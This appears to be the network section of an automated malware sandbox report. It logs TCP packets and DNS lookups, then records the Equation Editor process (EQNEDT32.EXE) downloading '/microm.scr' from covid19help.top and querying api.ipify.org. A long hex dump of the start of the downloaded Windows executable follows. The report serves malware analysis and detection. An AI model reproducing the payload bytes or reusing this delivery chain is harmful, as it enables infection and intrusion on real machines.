                                                                                                                                    Apr 26, 2024 03:05:50.403449059 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.403534889 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.403578043 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.403640985 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.406102896 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.406183004 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.406230927 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.406332016 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.406332016 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.408036947 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.408137083 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.408184052 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.408257961 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.408389091 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.410722017 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.410804033 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.410851955 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.410921097 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.412960052 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.413022041 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.413086891 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.413155079 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.413346052 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.415517092 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.415590048 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.415674925 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.415739059 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.417574883 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.417649031 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.417700052 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.417773008 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.418431044 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.420392036 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.420484066 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.420521975 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.420583963 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.421417952 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.422363043 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.422434092 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.422488928 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.422558069 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.425048113 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.425147057 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.425173044 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.425240040 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.427190065 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.427278042 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.427349091 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.427436113 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.428376913 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.429980993 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.430062056 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.430110931 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.430196047 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.432461023 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.432548046 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.432601929 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.432668924 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.434678078 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.434753895 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.434825897 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.434896946 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.437601089 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.437674999 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.437728882 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.437792063 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.439227104 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.439294100 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.439354897 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.439414978 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.442008018 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.442089081 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.442136049 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.442197084 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.443984032 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.444056034 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.444129944 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.444190025 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.446774960 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.446856022 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.446901083 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.446968079 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.497431040 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.497524977 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.497580051 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.497651100 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.499195099 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.499293089 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.499387980 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.499442101 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.514383078 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.514460087 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.514477015 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.514538050 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.514600992 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.514655113 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.514748096 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.514796019 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.514808893 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.514838934 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:51.676476955 CEST49162443192.168.2.22172.67.74.152
                                                                                                                                    Apr 26, 2024 03:05:51.676507950 CEST44349162172.67.74.152192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:51.677932024 CEST49162443192.168.2.22172.67.74.152
                                                                                                                                    Apr 26, 2024 03:05:51.686052084 CEST49162443192.168.2.22172.67.74.152
                                                                                                                                    Apr 26, 2024 03:05:51.686062098 CEST44349162172.67.74.152192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:51.959042072 CEST44349162172.67.74.152192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:51.959158897 CEST49162443192.168.2.22172.67.74.152
                                                                                                                                    Apr 26, 2024 03:05:52.028162956 CEST49162443192.168.2.22172.67.74.152
                                                                                                                                    Apr 26, 2024 03:05:52.028175116 CEST44349162172.67.74.152192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:52.029382944 CEST44349162172.67.74.152192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:52.236169100 CEST44349162172.67.74.152192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:52.236269951 CEST49162443192.168.2.22172.67.74.152
                                                                                                                                    Apr 26, 2024 03:05:52.307372093 CEST49162443192.168.2.22172.67.74.152
                                                                                                                                    Apr 26, 2024 03:05:52.352114916 CEST44349162172.67.74.152192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:52.477550983 CEST44349162172.67.74.152192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:52.477725983 CEST44349162172.67.74.152192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:52.477781057 CEST49162443192.168.2.22172.67.74.152
                                                                                                                                    Apr 26, 2024 03:05:52.515562057 CEST49162443192.168.2.22172.67.74.152
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Apr 26, 2024 03:05:48.587985992 CEST5456253192.168.2.228.8.8.8
                                                                                                                                    Apr 26, 2024 03:05:48.788902044 CEST53545628.8.8.8192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:51.500503063 CEST5291753192.168.2.228.8.8.8
                                                                                                                                    Apr 26, 2024 03:05:51.662383080 CEST53529178.8.8.8192.168.2.22
                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Apr 26, 2024 03:05:48.587985992 CEST192.168.2.228.8.8.80xea0dStandard query (0)covid19help.topA (IP address)IN (0x0001)false
                                                                                                                                    Apr 26, 2024 03:05:51.500503063 CEST192.168.2.228.8.8.80xd734Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Apr 26, 2024 03:05:48.788902044 CEST8.8.8.8192.168.2.220xea0dNo error (0)covid19help.top104.21.83.128A (IP address)IN (0x0001)false
                                                                                                                                    Apr 26, 2024 03:05:48.788902044 CEST8.8.8.8192.168.2.220xea0dNo error (0)covid19help.top172.67.175.222A (IP address)IN (0x0001)false
                                                                                                                                    Apr 26, 2024 03:05:51.662383080 CEST8.8.8.8192.168.2.220xd734No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                    Apr 26, 2024 03:05:51.662383080 CEST8.8.8.8192.168.2.220xd734No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                    Apr 26, 2024 03:05:51.662383080 CEST8.8.8.8192.168.2.220xd734No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                    • covid19help.top
                                                                                                                                    • api.ipify.org
                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.2249161104.21.83.1284432452C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-04-26 01:05:49 UTC312OUTGET /microm.scr HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                    Host: covid19help.top
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-04-26 01:05:49 UTC771INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 26 Apr 2024 01:05:49 GMT
                                                                                                                                    Content-Type: application/x-silverlight
                                                                                                                                    Content-Length: 857600
                                                                                                                                    Connection: close
                                                                                                                                    Last-Modified: Thu, 25 Apr 2024 07:52:56 GMT
                                                                                                                                    ETag: "d1600-616e7133f4613"
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x9fkQB%2BDqWVzHqMOjWhL%2BVK22N6HGqoLrvX9Cw4Sh5YVIbTlB%2BJILNR4Cy3i255htcLk5v4L8ISQxMqMu3IZVXGfZK6%2BzlNU33fCvo1K9qdDqD%2Flc4xAzBPipWN8zCtW76g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 87a2aaab2e6925a3-MIA
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    2024-04-26 01:05:49 UTC598INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 32 d9 f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 0a 0d 00 00 0a 00 00 00 00 00 00 ae 28 0d 00 00 20 00 00 00 40 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL20( @@ @
                                                                                                                                    2024-04-26 01:05:49 UTC1369INData Raw: 33 00 34 00 35 00 36 00 37 00 38 00 39 00 00 00 00 00 57 43 46 00 00 00 00 00 4b 65 72 62 65 72 6f 73 2a 86 48 86 f7 12 01 02 02 00 00 00 26 02 28 31 00 00 0a 00 00 2a 22 00 02 80 02 00 00 04 2a 4a 00 7e 06 00 00 04 74 a6 00 00 01 28 36 00 00 0a 26 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 1e 02 7b 08 00 00 04 2a 22 02 03 7d 08 00 00 04 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 22 02 28 31 00 00 0a 00 2a b2 28 05 00 00 06 80 03 00 00 04 28 37 00 00 0a 7e 03 00 00 04 28 1b 00 00 06 6f 38 00 00 0a 6f 39 00 00 0a 1f 23 9a 80 06 00 00
                                                                                                                                    Data Ascii: 3456789WCFKerberos*H&(1*"*J~t(6&*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*"(1*((7~(o8o9#
                                                                                                                                    2024-04-26 01:05:49 UTC1369INData Raw: 2a 1e 02 7b f3 01 00 04 2a 52 02 03 7d f3 01 00 04 02 03 28 be 00 00 06 7d f4 01 00 04 2a 36 02 28 b6 00 00 06 14 fe 01 16 fe 01 2a 1e 02 7b f4 01 00 04 2a 1e 02 28 c0 00 00 06 2a 1a 7e f8 01 00 04 2a 2e 73 c1 00 00 06 80 f8 01 00 04 2a 1e 02 28 c1 00 00 06 2a 1a 7e f9 01 00 04 2a 96 03 28 57 03 00 06 7b f6 04 00 04 6f ab 00 00 0a 28 9b 00 00 0a 2c 06 73 a8 00 00 06 2a 02 03 28 c3 00 00 06 2a 2e 73 c5 00 00 06 80 f9 01 00 04 2a 86 02 28 be 00 00 0a 03 2d 10 28 39 00 00 06 72 1d 0c 00 70 6f 5c 00 00 0a 7a 02 03 28 d6 00 00 06 2a 0a 17 2a 1e 02 7b fa 01 00 04 2a 1e 02 7b fb 01 00 04 2a 42 28 39 00 00 06 73 bf 00 00 0a 6f 5e 00 00 0a 7a 06 2a b2 02 7b fa 01 00 04 28 81 00 00 06 16 16 6f c0 00 00 0a 26 28 b0 03 00 06 2c 11 02 7b fd 01 00 04 02 7b fa 01 00 04
                                                                                                                                    Data Ascii: *{*R}(}*6(*{*(*~*.s*(*~*(W{o(,s*(*.s*(-(9rpo\z(**{*{*B(9so^z*{(o&(,{{
                                                                                                                                    2024-04-26 01:05:49 UTC1369INData Raw: ef 02 00 04 03 28 80 02 00 06 2a 6a 02 7b f0 02 00 04 2d 0b 02 73 19 02 00 06 7d f0 02 00 04 02 7b f0 02 00 04 2a 22 02 03 7d f0 02 00 04 2a 32 02 7b ed 02 00 04 6f b6 00 00 06 2a 3a 02 7b ed 02 00 04 03 04 6f a6 00 00 06 2a 3a 02 7c ef 02 00 04 03 04 28 81 02 00 06 2a 3a 02 7b ed 02 00 04 03 04 6f a7 00 00 06 2a 3a 02 7c ef 02 00 04 03 04 28 82 02 00 06 2a 52 02 03 28 24 01 00 06 02 1e 8d 48 00 00 02 7d fb 02 00 04 2a 1e 02 7b f7 02 00 04 2a 22 02 03 7d f7 02 00 04 2a 1e 02 7b f9 02 00 04 2a 22 02 03 7d f9 02 00 04 2a 1e 02 7b f8 02 00 04 2a 2a 02 03 04 16 28 52 01 00 06 2a ca 05 2c 19 03 28 e9 00 00 0a 2c 11 28 39 00 00 06 03 73 a8 00 00 0a 6f 5e 00 00 0a 7a 02 03 7d fc 02 00 04 02 04 7d fd 02 00 04 02 05 7d fe 02 00 04 2a 1a 7e 13 03 00 04 2a d2 03 72
                                                                                                                                    Data Ascii: (*j{-s}{*"}*2{o*:{o*:|(*:{o*:|(*R($H}*{*"}*{*"}*{**(R*,(,(9so^z}}}*~*r
                                                                                                                                    2024-04-26 01:05:49 UTC1369INData Raw: 03 00 04 03 04 05 6f 31 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 32 01 00 0a 2a 3e 02 7b 3c 03 00 04 03 04 05 6f 33 01 00 0a 2a 3e 02 7b 3c 03 00 04 03 04 05 6f 34 01 00 0a 2a 32 02 7b 3c 03 00 04 6f 35 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 36 01 00 0a 2a 76 02 25 7b 38 03 00 04 17 58 7d 38 03 00 04 02 7b 3c 03 00 04 03 04 05 6f e7 00 00 0a 2a 76 02 25 7b 38 03 00 04 17 58 7d 38 03 00 04 02 7b 3c 03 00 04 03 04 05 6f ae 00 00 0a 2a 32 02 7b 3c 03 00 04 6f 37 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f ba 00 00 0a 2a 36 02 7b 3c 03 00 04 03 6f b9 00 00 0a 2a 3a 02 7b 3c 03 00 04 03 04 6f 38 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 39 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 3a 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 3b 01 00 0a 2a 36 02 7b 3c 03 00 04 03 6f 3c 01 00
                                                                                                                                    Data Ascii: o1*6{<o2*>{<o3*>{<o4*2{<o5*6{<o6*v%{8X}8{<o*v%{8X}8{<o*2{<o7*6{<o*6{<o*:{<o8*6{<o9*6{<o:*6{<o;*6{<o<
                                                                                                                                    2024-04-26 01:05:49 UTC1369INData Raw: 4e 02 28 20 02 00 06 6f 35 02 00 06 03 04 6f 41 01 00 06 2a 32 02 28 20 02 00 06 6f 37 02 00 06 2a 36 02 03 28 96 01 00 0a 28 2a 02 00 06 2a 4e 02 7b 68 03 00 04 03 02 7b 6a 03 00 04 6f 38 02 00 06 2a fe 02 28 20 02 00 06 6f 35 02 00 06 03 6f 3b 01 00 06 03 6f b0 00 00 0a 02 28 28 02 00 06 28 98 00 00 06 2d 1a 28 39 00 00 06 72 eb 2b 00 70 28 35 00 00 06 73 ad 00 00 0a 6f 5e 00 00 0a 7a 2a ee 02 28 20 02 00 06 6f 35 02 00 06 03 6f 3b 01 00 06 04 03 02 28 28 02 00 06 6f 97 01 00 0a 2d 1a 28 39 00 00 06 72 eb 2b 00 70 28 35 00 00 06 73 ad 00 00 0a 6f 5e 00 00 0a 7a 2a 3a 02 03 02 7b 6a 03 00 04 28 2f 02 00 06 2a 3a 02 7b 68 03 00 04 03 04 6f 3a 02 00 06 2a ae 02 72 ac 09 00 70 7d 6e 03 00 04 02 73 43 02 00 06 7d 6f 03 00 04 02 28 41 00 00 0a 02 03 7d 6b 03
                                                                                                                                    Data Ascii: N( o5oA*2( o7*6((**N{h{jo8*( o5o;o(((-(9r+p(5so^z*( o5o;((o-(9r+p(5so^z*:{j(/*:{ho:*rp}nsC}o(A}k
                                                                                                                                    2024-04-26 01:05:49 UTC1369INData Raw: 00 04 fe 15 71 00 00 02 2a 5a 02 28 ae 01 00 0a 2d 0c 02 7c 1d 04 00 04 28 8d 02 00 06 2a 17 2a 8a 02 7b 1e 04 00 04 2c 0b 02 7b 1e 04 00 04 6f 03 01 00 0a 02 7c 1d 04 00 04 28 9d 02 00 06 16 fe 01 2a 66 02 7e 8e 00 00 0a 17 28 ad 01 00 0a 02 7c 20 04 00 04 fe 15 71 00 00 02 2a 5a 02 28 ae 01 00 0a 2d 0c 02 7c 20 04 00 04 28 8d 02 00 06 2a 17 2a 3e 02 7c 20 04 00 04 28 ab 02 00 06 16 fe 01 2a 22 02 03 7d 91 00 00 0a 2a 32 02 7b 91 00 00 0a 28 ae 02 00 06 2a 1a 73 b0 02 00 06 2a 3e 02 7b 91 00 00 0a 28 b8 02 00 06 16 fe 01 2a 3e 02 04 28 8f 00 00 0a 02 03 28 90 00 00 0a 2a 32 02 7b 91 00 00 0a 28 bc 02 00 06 2a 32 02 7b 91 00 00 0a 28 bf 02 00 06 2a 36 02 7b 91 00 00 0a 28 ba 01 00 0a 17 2a 2e 7e 8e 00 00 0a 73 c1 02 00 06 2a 1e 02 28 c7 02 00 06 2a 2e 7e
                                                                                                                                    Data Ascii: q*Z(-|(**{,{o|(*f~(| q*Z(-| (**>| (*"}*2{(*s*>{(*>((*2{(*2{(*6{(*.~s*(*.~
                                                                                                                                    2024-04-26 01:05:49 UTC1369INData Raw: 2f 03 00 06 2a 2e 02 03 04 05 16 28 2f 03 00 06 2a a2 02 7b 80 04 00 04 2d 11 02 02 6f e4 01 00 0a 73 f7 01 00 0a 7d 80 04 00 04 02 7b 80 04 00 04 03 04 05 6f f8 01 00 0a 2a 32 02 7b 7d 04 00 04 6f fa 01 00 0a 2a da 02 28 41 00 00 0a 03 17 2f 1f 28 39 00 00 06 72 2d 31 00 70 72 bf 24 00 70 28 35 00 00 06 73 5d 00 00 0a 6f 5e 00 00 0a 7a 02 03 8d 8e 00 00 02 7d 85 04 00 04 2a 1e 02 7b 84 04 00 04 2a 1e 02 7b 83 04 00 04 2a 5e 02 7b 85 04 00 04 02 7b 83 04 00 04 8f 8e 00 00 02 7b 88 04 00 04 2a 5e 02 7b 85 04 00 04 02 7b 83 04 00 04 8f 8e 00 00 02 28 4c 03 00 06 2a 5e 02 7b 85 04 00 04 02 7b 83 04 00 04 8f 8e 00 00 02 7b 89 04 00 04 2a 5e 02 7b 85 04 00 04 02 7b 83 04 00 04 8f 8e 00 00 02 7b 8a 04 00 04 2a 5e 02 7b 85 04 00 04 02 7b 83 04 00 04 8f 8e 00 00
                                                                                                                                    Data Ascii: /*.(/*{-os}{o*2{}o*(A/(9r-1pr$p(5s]o^z}*{*{*^{{{*^{{(L*^{{{*^{{{*^{{
                                                                                                                                    2024-04-26 01:05:49 UTC1369INData Raw: 2d 02 17 7d 9e 05 00 04 02 7b 9c 05 00 04 75 40 00 00 01 28 00 02 00 06 02 7b 99 05 00 04 28 fc 01 00 06 02 7b 9a 05 00 04 28 fd 01 00 06 2a 92 02 7b 9e 05 00 04 2c 1b 28 39 00 00 06 02 28 42 00 00 0a 6f 04 02 00 0a 73 05 02 00 0a 6f 5e 00 00 0a 7a 2a 2e 02 03 14 04 05 28 ac 03 00 06 2a c6 02 28 0d 02 00 0a 03 28 e9 00 00 0a 2c 0d 02 72 51 32 00 70 7d ac 05 00 04 2b 07 02 03 7d ac 05 00 04 02 04 7d aa 05 00 04 02 05 7d ab 05 00 04 2a 5a 72 5d 32 00 70 02 7b ac 05 00 04 72 c3 32 00 70 28 50 01 00 0a 2a 4a 7e af 05 00 04 2d 05 28 b1 03 00 06 7e ae 05 00 04 2a e2 28 38 00 00 06 2c 2a 28 38 00 00 06 6f 14 02 00 0a 2c 1e 28 38 00 00 06 6f 14 02 00 0a 6f 15 02 00 0a 2c 0d 28 46 00 00 06 2c 06 17 80 ae 05 00 04 17 80 af 05 00 04 2a 8a 28 b0 03 00 06 2c 1a 1f 10
                                                                                                                                    Data Ascii: -}{u@({({(*{,(9(Boso^z*.(*((,rQ2p}+}}}*Zr]2p{r2p(P*J~-(~*(8,*(8o,(8oo,(F,*(,
                                                                                                                                    2024-04-26 01:05:49 UTC1369INData Raw: 1a 72 b0 3a 00 70 2a 1a 72 24 3b 00 70 2a 1a 72 98 3b 00 70 2a 1a 72 31 3c 00 70 2a 1a 72 bc 3c 00 70 2a 1a 72 47 3d 00 70 2a 1a 72 e0 3d 00 70 2a 1a 72 60 3e 00 70 2a 1a 72 dc 3e 00 70 2a 1a 72 65 3f 00 70 2a 1a 72 e3 3f 00 70 2a 1a 72 70 40 00 70 2a 1a 72 f3 40 00 70 2a 1a 72 6f 41 00 70 2a 1a 72 ef 41 00 70 2a 1a 72 72 42 00 70 2a 1a 72 f7 42 00 70 2a 1a 72 7c 43 00 70 2a 1a 72 f6 43 00 70 2a 1a 72 97 44 00 70 2a 3e 02 28 f1 03 00 06 02 02 03 28 1b 04 00 06 2a 3e 02 28 f1 03 00 06 02 03 04 28 1b 04 00 06 2a 36 02 7b e2 05 00 04 03 6f 2e 02 00 0a 2a 32 02 7b e2 05 00 04 6f 2f 02 00 0a 2a 1e 02 7b e1 05 00 04 2a 32 02 7b e2 05 00 04 6f 06 00 00 0a 2a d6 03 2d 10 28 39 00 00 06 72 13 45 00 70 6f 5c 00 00 0a 7a 04 2d 10 28 39 00 00 06 72 21 45 00 70 6f 5c
                                                                                                                                    Data Ascii: r:p*r$;p*r;p*r1<p*r<p*rG=p*r=p*r`>p*r>p*re?p*r?p*rp@p*r@p*roAp*rAp*rrBp*rBp*r|Cp*rCp*rDp*>((*>((*6{o.*2{o/*{*2{o*-(9rEpo\z-(9r!Epo\


